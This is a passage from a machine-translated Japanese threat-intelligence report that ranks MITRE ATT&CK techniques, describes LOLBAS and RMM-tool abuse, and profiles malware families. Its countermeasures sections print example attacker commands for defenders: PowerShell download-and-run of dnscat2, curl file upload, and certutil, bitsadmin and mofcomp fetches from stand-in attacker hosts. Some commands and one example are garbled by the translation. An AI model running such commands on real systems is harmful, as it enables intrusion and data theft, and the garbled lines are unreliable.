最後の欄の上向きの矢印は、前回のレポートからそのテクニックの使用率が増加 したことを示し、下向きの矢印は使用率が減少したことを示し、 等号(=)の記号は、前回のレポートと同じ位置にそのテクニックがあることを意味する。
| 技術名 | テクニックID | 戦術名 | 最終レポート | 変更 |
|---|---|---|---|---|
|
プロセス・インジェクション
|
T1055
|
特権のエスカレーション、防御回避
|
1
|
=
|
|
システム情報の発見
|
T1082
|
ディスカバリー
|
3
|
↑
|
|
DLLサイドローディング
|
T1574.002
|
永続性、特権のエスカレーション、防御回避
|
4
|
↑
|
|
入力キャプチャ
|
T1056
|
クレデンシャル・アクセス、コレクション
|
2
|
↓
|
|
セキュリティ・ソフトウェアの発見
|
T1518.001
|
ディスカバリー
|
NA
|
↑
|
|
マスカレード
|
T1036
|
防御回避
|
10
|
↑
|
|
ファイルとディレクトリの検出
|
T1083
|
ディスカバリー
|
13
|
↑
|
|
プロセス・ディスカバリー
|
T1057
|
ディスカバリー
|
19
|
↑
|
|
アプリケーション層プロトコル
|
T1071
|
コマンド&コントロール
|
6
|
↓
|
|
レジストリの実行キー/スタートアップフォルダ
|
T1547.001
|
永続性、特権のエスカレーション
|
9
|
↓
|
|
非アプリケーション層プロトコル
|
T1095
|
コマンド&コントロール
|
5
|
↓
|
|
リモート・システム・ディスカバリー
|
T1018
|
ディスカバリー
|
15
|
↑
|
|
アプリケーション・ウィンドウの発見
|
T1010
|
ディスカバリー
|
NA
|
↑
|
|
ソフトウェア梱包
|
T1027.002
|
防御回避
|
NA
|
↑
|
|
スケジュールされたタスク/ジョブ
|
T1053
|
実行、永続性、特権の昇格
|
8
|
↓
|
|
Windowsサービス
|
T1543.003
|
永続性、特権のエスカレーション
|
12
|
↓
|
|
ツールの無効化または変更
|
T1562.001
|
防御回避
|
18
|
↑
|
|
コマンドとスクリプトのインタープリター
|
T1059
|
実行
|
7
|
↓
|
|
難読化されたファイルまたは情報
|
T1027
|
防御回避
|
NA
|
↑
|
|
リムーバブルメディアによるレプリケーション
|
T1091
|
イニシャル・アクセス、ラテラル・ムーブメント
|
11
|
↓
|
| テクニックID | |
|---|---|
| プロセス・インジェクション |
T1055
|
| システム情報の発見 |
T1082
|
| DLLサイドローディング |
T1574.002
|
| 入力キャプチャ |
T1056
|
| セキュリティ・ソフトウェアの発見 |
T1518.001
|
| マスカレード |
T1036
|
| ファイルとディレクトリの検出 |
T1083
|
| プロセス・ディスカバリー |
T1057
|
| アプリケーション層プロトコル |
T1071
|
| レジストリの実行キー/スタートアップフォルダ |
T1547.001
|
| 非アプリケーション層プロトコル |
T1095
|
| リモート・システム・ディスカバリー |
T1018
|
| アプリケーション・ウィンドウの発見 |
T1010
|
| ソフトウェア梱包 |
T1027.002
|
| スケジュールされたタスク/ジョブ |
T1053
|
| Windowsサービス |
T1543.003
|
| ツールの無効化または変更 |
T1562.001
|
| コマンドとスクリプトのインタープリター |
T1059
|
| 難読化されたファイルまたは情報 |
T1027
|
| リムーバブルメディアによるレプリケーション |
T1091
|
| 戦術名 | |
|---|---|
| プロセス・インジェクション |
特権のエスカレーション、防御回避
|
| システム情報の発見 |
ディスカバリー
|
| DLLサイドローディング |
永続性、特権のエスカレーション、防御回避
|
| 入力キャプチャ |
クレデンシャル・アクセス、コレクション
|
| セキュリティ・ソフトウェアの発見 |
ディスカバリー
|
| マスカレード |
防御回避
|
| ファイルとディレクトリの検出 |
ディスカバリー
|
| プロセス・ディスカバリー |
ディスカバリー
|
| アプリケーション層プロトコル |
コマンド&コントロール
|
| レジストリの実行キー/スタートアップフォルダ |
永続性、特権のエスカレーション
|
| 非アプリケーション層プロトコル |
コマンド&コントロール
|
| リモート・システム・ディスカバリー |
ディスカバリー
|
| アプリケーション・ウィンドウの発見 |
ディスカバリー
|
| ソフトウェア梱包 |
防御回避
|
| スケジュールされたタスク/ジョブ |
実行、永続性、特権の昇格
|
| Windowsサービス |
永続性、特権のエスカレーション
|
| ツールの無効化または変更 |
防御回避
|
| コマンドとスクリプトのインタープリター |
実行
|
| 難読化されたファイルまたは情報 |
防御回避
|
| リムーバブルメディアによるレプリケーション |
イニシャル・アクセス、ラテラル・ムーブメント
|
| 最終レポート | |
|---|---|
| プロセス・インジェクション |
1
|
| システム情報の発見 |
3
|
| DLLサイドローディング |
4
|
| 入力キャプチャ |
2
|
| セキュリティ・ソフトウェアの発見 |
NA
|
| マスカレード |
10
|
| ファイルとディレクトリの検出 |
13
|
| プロセス・ディスカバリー |
19
|
| アプリケーション層プロトコル |
6
|
| レジストリの実行キー/スタートアップフォルダ |
9
|
| 非アプリケーション層プロトコル |
5
|
| リモート・システム・ディスカバリー |
15
|
| アプリケーション・ウィンドウの発見 |
NA
|
| ソフトウェア梱包 |
NA
|
| スケジュールされたタスク/ジョブ |
8
|
| Windowsサービス |
12
|
| ツールの無効化または変更 |
18
|
| コマンドとスクリプトのインタープリター |
7
|
| 難読化されたファイルまたは情報 |
NA
|
| リムーバブルメディアによるレプリケーション |
11
|
| 変更 | |
|---|---|
| プロセス・インジェクション |
=
|
| システム情報の発見 |
↑
|
| DLLサイドローディング |
↑
|
| 入力キャプチャ |
↓
|
| セキュリティ・ソフトウェアの発見 |
↑
|
| マスカレード |
↑
|
| ファイルとディレクトリの検出 |
↑
|
| プロセス・ディスカバリー |
↑
|
| アプリケーション層プロトコル |
↓
|
| レジストリの実行キー/スタートアップフォルダ |
↓
|
| 非アプリケーション層プロトコル |
↓
|
| リモート・システム・ディスカバリー |
↑
|
| アプリケーション・ウィンドウの発見 |
↑
|
| ソフトウェア梱包 |
↑
|
| スケジュールされたタスク/ジョブ |
↓
|
| Windowsサービス |
↓
|
| ツールの無効化または変更 |
↑
|
| コマンドとスクリプトのインタープリター |
↓
|
| 難読化されたファイルまたは情報 |
↑
|
| リムーバブルメディアによるレプリケーション |
↓
|
MITRE D3FEND™ を使用して、BlackBerry Threat Research and Intelligence チームは、この報告期間中に観測された技術に対する完全な対策リストを作成し、GitHub で公開しています。
上位3つのテクニックは、攻撃を成功させるための重要な情報を収集するために敵が使用するよく知られた手順です。Applied Countermeasuresのセクションには、それらの使用例と、監視に役立つ情報がいくつか掲載されている。
テクニックと戦術の合計の影響は、下のグラフで見ることができる:
注目されるMITREテクニックの応用対策
-
セキュリティ・ソフトウェアの発見 - T1518.001
このポピュラーな手法により、サイバー脅威者は標的とするシステムやクラウド環境にインストールされているセキュリティ・プログラム、設定、センサーのリストを見つけることができる。これは、検知されないことを望む敵対者にとって非常に重要です。例えば、悪意のあるグループが侵害されたシステム上で以下のコマンドのいずれかを実行し、その環境が悪意のある活動を発見するためのセキュリティをすでに備えていることを検出した場合、多くの場合、その操作を中止します。他のケースでは、より高度で永続的なグループは、セキュリティアプリケーションを区別し、より弱いアプリケーションを回避する方法を見つけることができます。その結果、敵対者がシステムやクラウド環境をコントロールするようになることもある。
以下は、攻撃者があなたのセキュリティを評価するために使用する可能性のあるコマンドラインです:
- netsh firewall show
- netsh.exe インターフェースダンプ
- findstr /s /m /i "ディフェンダー" *.*.
- タスクリスト /v
- Powershell Empire Module Get-AntiVirusProduct
- cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
-
マスカレード - T1036
これは、攻撃者がその活動を偽装し、検知を逃れるために採用する高度なサイバー脅威戦術である。例えば、偽の名前、アイコン、メタデータを使用することで、有害な行為を標準的なシステム操作として簡単に偽装することができます。正規のファイルやプロセスを装うことで、ユーザーやセキュリティソフトウェアを騙して偽のファイルを開かせたり保存させたりすることができ、システム侵入やデータ損失につながる可能性があります。(マスカレード手法の特定に関する詳細は、本レポートのCylanceMDR Observationsセクションをご覧ください)。
ここでは、一般的なマスカレードの方法を紹介する:
- 実行可能ファイルの名前の変更:攻撃者は、悪意のある実行可能ファイルの名前を変更して、正規のシステム・プログラムのように見せかけたり(例:svchost.exe、explorer.exe)、.txt.docや.exe.configなど、本当のファイル・タイプを隠すために別の偽の拡張子を変更または追加したりします。その目的は、手動または自動のシステムチェックを実行する際に、ユーザーやセキュリティツールを欺くことです。そのため、ユーザーはシステムの警告に耳を傾けることなく、悪意のあるファイルを実行したり、開こうとしたりします。
- ファイルパスを模倣する:一般的に信頼されているディレクトリ(例:System32)には、セキュリティ・ツールによる監視や検出があまり行われません。そのため、攻撃者はこれらのディレクトリに悪意のあるファイルを配置し、正規のプロセス名を付けて隠蔽することがよくあります。
- 無効なコード署名:攻撃者は、セキュリティ対策を回避するために、不正なデジタル証明書や盗まれたデジタル証明書でマルウェアに署名することがあります。これにより、あたかも正当なソースによって検証されたかのように見せかけることで、システムやユーザーを欺き、悪意のあるファイルやプロセスを信用させます。攻撃者は、期限切れ、失効、または不正に入手した証明書を使用することがあります。このような手口を識別するには、堅牢な証明書検証プロセスと、異常な証明書データや検証失敗のフラグを立てることができる警告システムが必要です。例えば、cmd.exe を電卓アプリとして偽装するには、次のようにします:
c:㊦cmd.exe を電卓アプリとして偽装するには、次のようにコピーします。
-
ファイルとディレクトリの検出 - T1083
ファイルおよびディレクトリの検出は、攻撃者の偵察段階で頻繁に利用され、標的環境に対する洞察を得たり、流出や操作の可能性のあるファイルを特定したり、機密情報を特定したり、攻撃チェーンのさらなる段階をサポートしたりします。
以下は、このテクニックに使われるコマンドラインである:
- 'dir /s C: \pathto\directory' - dir ユーティリティを使用して、特定のディレクトリとそのサブディレク トリ内のファイルとディレクトリを再帰的に一覧表示する。
- 'tree /F' - ツリー・ユーティリティを使って、ディレクトリ・ツリーとともに各ディレクトリのファイル名を表示する。
- 'powershell.exe -c "Get-ChildItem C:∕pathto∕directory"' - powershellでGet-ChildItemコマンドレットを実行し、指定されたパスにあるファイルとディレクトリのリストを取得する。
脅威行為者はまた、ファイルやディレクトリを列挙するためにWindowsネイティブAPI関数を使用することができる。以下は、脅威者が使用する Windows API 関数である:
- FindFirstFile - 指定されたファイル名またはディレクトリ名のパターンに一致する最初のファイルまたはディレクトリに関する情報を取得します。
- FindNextFile - FindFirstFile関数の呼び出しによって開始されたファイル検索を続行する。
- PathFileExists - 指定されたディレクトリまたはファイルが存在するかどうかを確認します。
-
アプリケーション・レイヤー・プロトコル - T1071
脅威行為者は、検知を回避するために、正当なトラフィックの中に自分たちの行為を隠す新しい方法を常に模索している。アプリケーション層のプロトコル操作(T1071)はよく使われる手法です。2024年の最初の3カ月間、この手口は悪意のある行為者によって採用された上位5つの手口の1つに浮上しました。HTTP、HTTPS、DNS、SMBなど、一般的に使用されているネットワーク・プロトコルの脆弱性を悪用することで、悪意のある行為を通常のネットワーク・トラフィックにシームレスに紛れ込ませることができます。
このテクニックは、データの流出、C2通信の有効化、侵害されたネットワーク内での横方向の移動に使用することができます。例えば、敵対者は機密データを HTTP ヘッダー内にエンコードしたり、DNS トンネリングを活用してネットワーク防御を迂回し、疑いを持たれることなく情報を引き出すことがあります。従来のセキュリティ・ツールの多くは、正常なネットワーク・アクティビティと悪意のあるネットワーク・アクティビティを区別するのに苦労しているため、アプリケーション層のプロトコル操作のステルス性は、検知と帰属に大きな課題をもたらします。
このテクニックの普及と巧妙化を考えると、組織は防御を強化するためにプロアクティブな対策を採用しなければならない。堅牢なネットワーク・モニタリング・ソリューションは、異常なトラフィック・パターンを検出し、アプリケーション層のプロトコル操作に関連する疑わしい動作を、日常的なユーザー活動から正確に区別できるようにする必要があります。
さらに、ネットワーク・プロトコルやアプリケーションに最新のセキュリティ・パッチを適用することで、既知の脆弱性や悪用を軽減することができます。エンドポイント検出・対応(EDR)ソリューションを導入することで、企業はアプリケーション層のプロトコル操作によって行われる悪意のある活動を特定し、対応する能力を強化することができ、サイバーセキュリティの全体的な態勢を強化することができます。
以下は、脅威行為者が使用するAPLコマンドである: curl -F "file=@C:¶Userserstester ¶Desktop ¶test[.]txt 127[.]0[.]0[.]1/file/upload
powershell IEX (New-Object System.Net.Webclient).DownloadString('hxxps://raw[.]git hubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1') -
レジストリの実行キー / スタートアップフォルダ - T1547.001
レジストリの実行キー/スタートアップフォルダの操作は、侵害されたシステム上で永続性を確立するために敵対者によって使用される手法です。この手口は、今回の報告期間においてサイバー脅威行為者によって利用された上位の手口の中で際立っていました。Windows レジストリ キーを改ざんしたり、スタートアップ フォルダに悪意のあるエントリを追加したりすることで、悪意のあるペイロードがシステムの起動時やユーザーのログイン時に自動的に実行され、侵害されたシステムを継続的に制御できるようにします。
この手法により、敵はバックドア、キーロガー、ランサムウェアを含む広範なマルウェアを展開し、侵害されたシステムへの持続的なアクセスを維持することができる。敵は、検出を回避するためにWindowsのネイティブ機能を悪用します。正規のシステム設定が悪用されることで、従来のAVソリューションではこれらの脅威の検出と軽減がより困難になっています。
レジストリの実行キーやスタートアップフォルダの操作によってもたらされる脅威に対抗するため、組織はエンドポイントセキュリティに多層的なアプローチを採用する必要がある:
- Windowsレジストリキーとスタートアップフォルダを定期的に監視および監査し、悪意のある活動を示す不正な変更を検出する。
- 許可されていない実行ファイルを防ぐために、アプリケーションのホワイトリストを導入する。
- 敵対者が重要なシステム設定を操作する能力を制限するために、権限管理を設定する。
- 従業員が疑わしいスタートアップ項目やレジストリの変更を認識し、報告できるよう、ユーザー教育や意識向上プログラムを実施する。
- 全体的な脅威の検知と対応能力を強化する。
警戒すべきコマンドには次のようなものがある:
REG ADD "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders" /v Test /t REG_SZ /d "Test McTesterson"
echo "" > "%APPDATA%¥Microsoft¥Windows¥Start Menu¥Programs¥Startup¥File[.]txt"
CylanceMDR データ
このセクションでは、CylanceMDR の顧客環境で観測された最も一般的な脅威の検出例をいくつか紹介します。
CylanceMDRCylanceGUARDこれは、BlackBerry が提供するサブスクリプション・ベースのマネージド検知・対応(MDR)サービスであり、24時間365日の監視を行い、顧客のセキュリティ・プログラムのギャップを悪用する高度なサイバー脅威の阻止を支援する。CylanceMDR チームは、この報告期間中に何千ものアラートを追跡しました。以下では、遠隔測定結果を地域別に分類し、現在の脅威の状況についてさらに詳しく説明します。
CylanceMDR 観察
この報告期間中、CylanceMDR チームは、Certutil が セキュリティオペレーションセンター (SOC) 内で多くの検出活動、すなわち、Certutil のようなツールの名前の変更に関連する技術 (例: 「Possible Certutil Renamed Execution」) を推進していることを観察しました。BlackBerry が顧客を保護するすべての地域にわたって、これに関連する検出が急増しました。
前回のレポートでは、CertutilのようなLOLBAS(living-off-the-land binaries and scripts)ユーティリティが、脅威行為者によってどのように悪用または悪用されるかについて説明しました。脅威行為者は、検出機能を回避しようとして、正規のユーティリティ(Certutilなど)の名前を変更することがよくあります。これは、マスカレードとして知られており、MITRE Technique ID: T1036.003 を持っています。防御者は、マスカレードのような回避テクニックのリスクを最小化するために、堅牢な検出機能を導入する必要があります。たとえば、Certutilコマンド(このツールで悪用されるオプション/引数も含む)を検出したときにのみトリガーする検出ルールを作成すると、簡単に回避される可能性があります。
以下の2つのコマンドを例にとってみましょう:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
検出機能が certutilコマンド(とそのオプション)を見ることだけに依存している場合、これは検出されますが、簡単に回避される可能性があるため、弱い保護と見なされます。
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
この場合、我々はcertutil.exeの名前をoutlook.exeに変更しており、これにより(上述のロジックを使用した場合)検出を完全に回避することができる。
より良い解決策は、オリジナルのファイル名(コンパイル時に提供される内部ファイル名)のようなポータブル実行可能ファイル(PE)ファイル/プロセスのメタデータが収集され、検出機能に統合されることを保証することでしょう。ディスク上のファイル名とバイナリのPEメタデータの不一致は、バイナリがコンパイル後にリネームされたことを示す良い指標となります。
LOLBAS 活動
この報告期間中、われわれは、顧客環境で見られるLOLBAS活動の変化を指摘した:
- regsvr32.exeに関連する検出の増加。
- mshta.exe関連の活動の減少。
- bitsadmin.exeに関連する検出の急増。
以下は、悪質なLOLBASの使用例である(前回の報告期間中に共有されたものを除く)。
ファイル名: Bitsadmin.exe
ミットレT1197 | T1105
どのように悪用されるか
- 悪意のあるホストからの、または悪意のあるホストへのダウンロード/アップロード(Ingressツール転送)
- 悪意のあるプロセスの実行に使用可能
Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest
ファイル:mofcomp.exe
ミットレT1218
どのように悪用されるか
- 悪意のあるマネージド・オブジェクト・フォーマット(MOF)スクリプトのインストールに使用可能
- MOFステートメントはmofcomp.exeユーティリティによって解析され、ファイル内で定義されたクラスとクラスインスタンスをWMIリポジトリに追加する。
Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof
リモート監視・管理(RMM)ツールは、マネージドITサービス・プロバイダー(MSP)が顧客のエンドポイントをリモート監視するために頻繁に使用されている。残念ながら、RMMツールは、脅威行為者が同じシステムにアクセスすることも可能にしています。これらのツールは多くの管理機能を提供し、信頼され承認されたツールを使用することで、脅威行為者に紛れ込む方法を提供します。
2023年、RMMツールの悪用は、2023年9月のMGMリゾーツ・インターナショナルの攻撃の背後にいると考えられているサイバー攻撃グループ、Scattered Spiderに関連する報告により、焦点となった。Scattered Spiderのメンバーは、洗練されたソーシャルエンジニアリングの専門家と考えられており、SIMスワップ攻撃、フィッシング、プッシュボミングなどのさまざまなテクニックを展開しています。彼らは攻撃の際、以下のような様々なRMMツールを使用しています:
- スプラッシュトップ
- チームビューアー
- スクリーンコネクト
2024年の最初の報告期間の時点で、ConnectWiseScreenConnect(23.9.8以下のすべてのバージョン)に2つの脆弱性が発見されて以来、RMMツールへの注目は高いままです。CVEの詳細は以下をご覧ください:
CVE-2024-1709
CWE-288:代替パスまたはチャネルを使用した認証バイパス。
CVE-2024-1708
CWE-22:制限付きディレクトリへのパス名の不適切な制限(「パストラバーサル」)。
以下のグラフは、この報告期間中に観察された最も一般的なRMMツールを示している。
分析の結果、多くの顧客が複数の RMM ツールを使用しており、組織の攻撃対象領域とリスクが増大していることが判明した。推奨される緩和策には以下が含まれる:
リモートアクセスツール(RMMツール)の監査
- 環境内で現在使用されているRMMツールを特定する。
- 環境内で承認されていることを確認する。
- 複数のRMMツールを使用している場合は、それらを統合できるかどうかを判断する。使用するツールの数を減らすことで、リスクを軽減できる。
ポートとプロトコルを無効にする
- 承認されていないリモートアクセスツールに関連する、一般的に使用されているポートへのインバウンドおよびアウトバウンドのネットワーク通信をブロックします。
定期的なログ監査
- リモートアクセスツールの異常使用を検出する。
パッチ
- 使用するRMMツールに関連する脆弱性を定期的に確認し、必要に応じて更新する。
- RMMツールのようなインターネットにアクセス可能なソフトウェアは、定期的なパッチサイクルを実施する際に、常に高い優先度を持つべきである。
ネットワーク・セグメンテーション
- ネットワークをセグメント化し、デバイスやデータへのアクセスを制限することで、横の動きを最小限に抑える。
デバイスのタグ付け
- セキュリティ・ベンダーが、RMM ツールを使用するデバイスにタグを付けるオプションを提供しているかどうかを確認する。提供されている場合は、これを有効にして SOC の可視性を確保する。ベンダーによっては、承認されたツール/アクティビティを特定するメモ/タグを残すオプションを提供しており、調査時にアナリストを大いに支援します。
メモリローディングRMM
- メモリ上にのみロードされるリモートアクセスを検出できるセキュリティソフトウェアを使用する。
結論
この 90 日間レポートは、将来の脅威に対する知識と備えを維持するために作成されています。急速に変化するサイバーセキュリティの脅威に対処するためには、業界や地域、重要課題に関する最新のセキュリティ・ニュースを常に把握しておくことが役立ちます。以下は、2024年1月から3月までの主な要点です:
- 社内のAttacks Stopped遠隔測定によると、BlackBerry 、当社のテナントに向けられた1日あたり37,000件の攻撃を阻止しました。 また、当社のテナントや顧客を標的としたユニークなマルウェアが大幅に増加しており、前回の報告期間と比較して1分あたり40%増加しています。このことは、脅威行為者が被害者を注意深く狙うために大規模な対策を取っていることを示唆している可能性があります。
- クリティカル・インフラ」、「営利企業」、「トップ・スレット」の各セクションでは、「インフォ スティーラー」が目立っています。このことは、機密データや個人データが、あらゆる地域や業種の脅威によって強く求められていることを示唆しています。
- 最も注目すべきランサムウェアグループについて説明した新しい「ランサムウェア・セクション」で強調したように、ランサムウェアは重要なインフラ、特に医療を標的とするようになってきています。
- CVEの悪用は昨年急速に拡大し 、今後も続くでしょう。 BlackBerry 、過去3カ月間にNISTが開示したCVEは9,000件近くも新たに記録されました。さらに、これらの開示された脆弱性の56%以上が重要度7.0以上のスコアを獲得しています。ConnectWise ScreenConnect、GoAnywhere、および複数の Ivanti 純正製品など、多用されている正規ソフトウェアに関連するエクスプロイトが、脅威行為者によって驚くほどの割合で武器化され、パッチの適用されていない被害者のマシンにマルウェアを大量に送り込んでいます。
- ディープフェイクや誤報による政治的欺瞞は、ソーシャルメディアを通じてますます広がっており、特にロシアのウクライナ侵攻、中東紛争の展開、11月に行われる米国大統領選挙に関連して、今後も問題となるだろう。
サイバーセキュリティの脅威のトップと防御策に関する詳細は、BlackBerry ブログでご覧いただけます。
謝辞
この報告書は、才能あるチームと個人の共同作業の賜物である。特に、以下の方々に敬意を表します:
付録重要インフラと営利企業の脅威
8Baseランサムウェア:2023年に初めて確認された、特に攻撃的なランサムウェアグループ。その歴史は浅く、北米やラテンアメリカ諸国の被害者を標的とすることが多い。この脅威グループは、初期アクセスを達成するためにさまざまな手口を駆使し、被害者のシステムの脆弱性を悪用して潜在的な支払いを最大化することもあります。
アマデイ(アマデイボット):モジュラー設計の多機能ボットネット。被害者のデバイスに侵入すると、C2サーバーからコマンドを受け取り、情報の窃取やペイロードの追加など、さまざまなタスクを実行します。
Buhti 比較的新しいランサムウェアであるBuhtiは、流出したLockBit 3.0 (a.k.a. LockBit Black)およびBabukランサムウェアファミリーの亜種を利用し、WindowsおよびLinuxシステムを攻撃します。さらにBuhtiは、特定の拡張子を持つファイルを盗むために設計された「Go」プログラミング言語で書かれたカスタムデータ流出ユーティリティを使用することが知られています。このランサムウェアの運営者は、IBMのAspera Faspexファイル交換アプリケーション(CVE-2022-47986)や、最近パッチが適用されたPaperCutの脆弱性(CVE-2023-27350)に影響を与える他の深刻なバグを迅速に悪用することもすでに確認されている。
LummaStealer(LummaC2):C言語ベースの情報窃取ツールで、営利企業や重要なインフラストラクチャ組織を標的としており、被害者のデバイスから個人情報や機密データを抜き取ることに重点を置いています。多くの場合、アンダーグラウンドのフォーラムやTelegramグループを通じて宣伝・配布され、この情報窃取者はトロイの木馬やスパムを利用して増殖します。
PrivateLoader:2021年以降、主に北米の営利企業を標的として野放しになっている悪名高いダウンローダー・ファミリー。PrivateLoaderは(その名の通り)初期アクセスメカニズムであり、被害者のデバイス、すなわち情報窃取装置への多数の悪質なペイロードの展開を容易にします。PrivateLoaderは、地下のペイ・パー・インストール(PPI)サービスを通じて配布ネットワークを運営し、継続的な使用と開発の資金を調達します。
ラクーンスティーラー MaaSインフォステーラー。2019年以降、RaccoonStealerのメーカーは、セキュリティソフトウェアや従来のAVソフトウェアを回避する能力を強化している。BlackBerry'の内部遠隔測定によると、RaccoonStealerは北米の商業企業を標的としていることが確認されている。
RedLine (RedLine Stealer): 広く配布されているマルウェア情報窃取ツールで、MaaS経由で販売されることが多い。このマルウェアを配布する脅威グループの主な動機は、政治、破壊、スパイ活動よりも、むしろ金銭的な利益にあるようです。このため、RedLineはさまざまな業界や地域を積極的に標的としています。
Remcos(RemcosRAT):コンピュータやデバイスを遠隔操作するために使用される商用グレードのRAT。正規のソフトウェアとして宣伝されていますが、このリモート・コントロールおよび監視ソフトウェアは、しばしばリモート・アクセス・トロイの木馬として使用されました。
SmokeLoader: 一般的に利用されているマルウェアで、被害者のデバイス上に他のマルウェアを展開するなど、多くの機能を備えています。SmokeLoader は、BlackBerry が複数のGlobal Threat Intelligence レポートを通じて繰り返し観測している脅威です。この報告期間中、このマルウェアは北米内の商業サービスおよび専門サービスを標的としていることが確認されています。
Vidar(VidarStealer):2018年から野放しになっているコモディティ情報窃取者で、重武器化されたマルウェア・ファミリーに発展しています。攻撃者は、ConnectWiseによる人気のあるScreenConnect RRMソフトウェアの脆弱性を悪用することで、Vidarを展開することができました。これらの2つのCVE、CVE-2024-1708とCVE-2024-1709は、脅威行為者が重要なシステムをバイパスしてアクセスすることを可能にしました。